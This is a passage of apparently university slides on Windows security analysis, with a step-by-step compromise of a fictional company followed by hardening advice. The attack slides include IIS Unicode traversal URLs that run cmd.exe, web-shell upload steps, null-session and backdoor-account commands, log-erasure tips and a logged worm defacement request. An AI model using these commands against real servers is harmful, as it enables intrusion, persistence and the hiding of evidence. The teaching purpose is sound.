670 likes | 855 Views
Windows Security Analysis Computer Science E-Commerce Security Matthew Cook http://escarpment.net/. Introduction. Loughborough University http://www.lboro.ac.uk/computing/ Janet Web Cache Service http://wwwcache.ja.net/. Windows Security Analysis. Introduction
E N D
Windows Security AnalysisComputer Science E-Commerce Security Matthew Cookhttp://escarpment.net/
Introduction Loughborough University http://www.lboro.ac.uk/computing/ Janet Web Cache Service http://wwwcache.ja.net/
Windows Security Analysis • Introduction • Step-by-step Machine Compromise • Preventing Attack • Further Reading • The Future
Introduction • Physical Security • Security Threats • “Hacker” or “Cracker” • The Easiest Security Improvement • Can you buy security?
Physical Security • Secure Location • BIOS restrictions • Password Protection • Boot Devices • Case Locks • Case Panels
Security Threats • Denial of Service • Theft of information • Modification • Fabrication (Spoofing or Masquerading)
Security Threats… Why a compromise can occur: • Physical Security Holes • Software Security Holes • Incompatible Usage Security Holes • Social Engineering • Complacency
“Hacker” or “Cracker” • “Hacker” used primarily by the media to describe malicious attacks by individuals • However the computing community uses “Cracker” to mean the same • A “Hacker” tinkers with systems for good purposes. (Not breaking the law) • To avoid confusion many people now say“A machine has been compromised!”Not “A machine has been hacked!”
The Easiest Security Improvement • Good passwords • Usernames and Passwords are the primary security defence • Use a password that is easy to type to avoid ‘Shoulder Surfers’ • Use the first letters from song titles, song lyrics or film quotations
Can you buy Security? “This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?” Bruce Schneier
Step-by-step Machine Compromise • Background • Gathering Information • Identifying System Weakness • Exploiting the Security Hole • Gaining ‘Root’ • Backdoor Access • System Alteration • Audit Trail Removal
Background Reasons for Attack: • Personal Issues • Political Statement • Financial Gain (Theft of money, information) • Learning Experience • DoS (Denial of Service) • Support for Illegal Activity • In our scenario we are going to attack the company laggyband.com
Gathering Information • Companies House • Internet SearchURL: http://www.google.co.uk • WhoisURL: http://www.netsol.com/cgi-bin/whois/whois • A Whois query can provide: • The Registrant • The Domain Names Registered • The Administrative, Technical and Billing Contact • Record updated and created date stamps • DNS Servers for the Domain
Gathering Information… • Use Nslookup or dig • dig @dns.laggyband.com www.laggyband.com • Different query type available: • A – Network address • Any – All or Any Information available • Mx – Mail exchange records • Soa – Zone of Authority • Hinfo – Host information • Axfr – Zone Transfer • Txt – Additional strings
Identifying System Weakness Many products available: • Nmap • Nessus • Pandora • Pwdump • L0pht Crack • Null Authentication
Nmap • Port Scanning Tool • Stealth scanning, OS Fingerprinting • Open Source • Runs under Unix based OS • Port development for Win32 • URL: http://www.insure.org/nmap/
Nessus • Remote security scanner similar to Typhon • Very comprehensive • Frequently updated modules • Testing of DoS attacks • Open Source • Win32 and Java Client • URL: http://nessus.org/
Pandora • Not strictly Windows Security • Runs on either Unix or Win32 • Excellent tool to evaluate Netware security • Open Source • Lots of additional information • URL: http://www.nmrc.org/pandora/
pwdump • Version 3 (e = encrypted) • Developed by Phil Staubs and Erik Hjelmstad • Based on pwdump and pwdump2 • URL: http://www.ebiz-tech.com/html/pwdump.html • Needs Administrative Privilidges • Extracts hashs even if syskey is installed • Extract from remote machines • Identifies accounts with no password • Self contained utility
L0pht Crack • Password Auditing and Recovery • Crack Passwords from many sources • Registration $249 • URL: http://www.atstake.com/research/lc3/
L0pht Crack Crack Passwords from: • Local Machine • Remote Machine • SAM File • SMB Sniffer • PWDump file
Nmap Analysis • nmap –sP 158.125.0.0/16 • Dependant on ICMP (Internet Control Message Protocol) • nmap –sP –PT80 158.125.0.0/16 • Dependant on TCP SYN/ACK packet
Nmap Analysis… • TCP Connect Scan • Completes a ‘Three Way Handshake’ • Very noisy (Detection by IDS)
Nmap Analysis… • TCP SYN Scan • Half open scanning (Full port TCP connection not made) • Less noisy than the TCP Connect Scan
Nmap Analysis… • TCP FIN Scan • FIN Packet sent to target port • RST returned for all closed ports • Mostly works UNIX based TCP/IP Stacks • TCP Xmas Tree Scan • Sends a FIN, URG and PUSH packet • RST returned for all closed ports • TCP Null Scan • Turns off all flags • RST returned for all closed ports • UDP Scan • UDP Packet sent to target port • “ICMP Port Unreachable” for closed ports
Null Authentication Null Authentication: • Net use \\camford\IPC$ “” /u:“” • Famous tools like ‘Red Button’ • Net view \\camford • List of Users, groups and shares • Last logged on date • Last password change • Much more…
Exploiting the Security Hole • Using IIS Unicode/Directory Traversal • /scripts/../../winnt/system32/cmd.exe /c+dir • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir • Displays the listing of c: in browser • Copy cmd.exe to /scripts/root.exe • Echo upload.asp • GET /scripts/root.exe /c+echo+[blah]>upload.asp • Upload cmdasp.asp using upload.asp • Still vulnerable on 24% of E-Commerce servers
Gaining ‘Root’ • Cmdasp.asp provides a cmd shell in the SYSTEM context • Increase in privileges is now simple • ISAPI.dll – RevertToSelf (Horovitz) • Version 2 coded by Foundstone • http://camford/scripts/idq.dll? • Patch Bulletin: MS01-26 • NOT included in Windows 2000 SP2
Backdoor Access • Create several user accounts • Net user iisservice <pass> /ADD • Net localgroup administrators iisservice /ADD • Add root shells on high end ports • Tiri is 3Kb in size • Add backdoors to ‘Run’ registry keys
System Alteration • Web page alteration • Information Theft • Enable services • Add VNC • Creating a Warez Server • Net start msftpsvc • Check access • Upload file 1Mb in size • Advertise as a warez server
Audit Trail Removal • Many machines have auditing disabled • Main problems are IIS logs • DoS IIS before logs sync to disc • Erase logs from hard disc • Erasing Eventlog harder • IDS Systems • Network Monitoring at firewall
Preventing Attack • NetBIOS/SMB Services • Hfnetchk and Qchain • SNMP Vulnerabilities • Active Directory Vulnerabilities • IPSec • IIS Security • IDS – Snort • .NET Server
NetBIOS/SMB Services • NetBIOS Browsing Request [UDP 137] • NetBIOS Browsing Response [UDP 138] • NetBIOS Communications [TCP 135] • CIFS [TCP 139, 445 UDP 445] • Port 445 Windows 2000 only • Block ports at firewall • Netstat -A
NetBIOS/SMB Services… To disable NetBIOS • Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties. • Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window
NetBIOS/SMB Services… Disable Null Authentication • Key similar to Windows NT 4.0 • HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous • REG_DWORD set to 0, 1 or 2! • HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous • REG_DWORD set to 0 or 1
Hfnetchk • Use Hfnetchk to check hot fixes • Checks machines against Microsoft XML • Automate the process using a batch files and a mail client (Postie) • URL: http://www.infradig.com/infradig/postie/ • Use QChain to chain hot fixes together without rebooting in-between.
Hfnetchk… Patch details for: • Windows NT 4.0, 2000, XP, .NET server • IIS 4, IIS 5 and IIS 6 • SQL Server 7.0 • SQL Server 2000 • Internet Explorer 5.01 (and later)
Hfnetchk… • Default scan of local host (Pre downloaded)hfnetchk –x mssecure.xml • Default scan of lboro domainhfnetchk –d lboro • Verbose scan of local hosthfnetchk –v –x mssecure.xml • Verbose scan including installed hot fixeshfnetchk –v –a b –x mssecure.xml
SNMP Vulnerabilities • Simple Network Management Protocol • Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25 • SNMP Utilities in Resource Kit • Turn off SNMP services • Set community names • Set accepted hosts
SNMP Vulnerabilities… • CERT Advisory “Tuesday 12th February” • Privilege Escalation, DoS, Instability • Block UDP 161 and 162 at firewall • Patch or disable SNMP • Patches available for Windows 2000 and XP • URL: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-006.asp
AD Vulnerabilities • Listing of AD contents using ldp.exe • Ldp is contained on the Resource Kit • Authenticated connection needed • Filter TCP 389 (LDAP) and 3268 (GC) • DNS – Securing Zone Transfers to Slave Name servers only
IPSec • IP security • Linux Connectivity using FreeS/WAN • Mainly for wireless use • WEP encryption cracked • URL: http://www.freeswan.org/ • URL: http://airsnort.sourceforge.net/
IIS Security • History • Recent Worms • IIS Lock Down Tool • URL Scan • The Future
IIS History • IIS 2.0 Installed by NT 4.0 • IIS 3.0 followed by more common IIS 4.0 • Quickly gained reputation for (in)security • IIS 5.0 Installed by Windows 2000 • IIS 6.0 Installed by .NET Server • Microsoft releases Hfnetchk • Closely followed by IIS Lockdown and URLScan
Recent Worms • Sadmind/IISDirectory Traversal (Unicode Exploit) • CodeRedida/idq buffer overflow • CodeGreen ida/idq buffer overflow • NimdaDirectory Traversal (Unicode Exploit)
Sadmind/IIS • 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 200 -
IIS Lock Down Tool • Automatic ‘Lock Down’ [Now 2nd version] • Locks down IIS 4.0 and IIS 5.0 • Express ‘lock down’ for simple web sites • Custom ‘lock down’ for more complex servers • Undo facility to reverse last ‘lock down’ • URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32362
Disable: Active Server Pages Index Server Interface Server Side Includes Internet Data Connector Internet Printing HTR Scripting Remove: Sample Web Files Script Virtual Directory MSADC Directory WebDAV Set Permissions on: Exe files Content Directories IIS Lock Down Tool…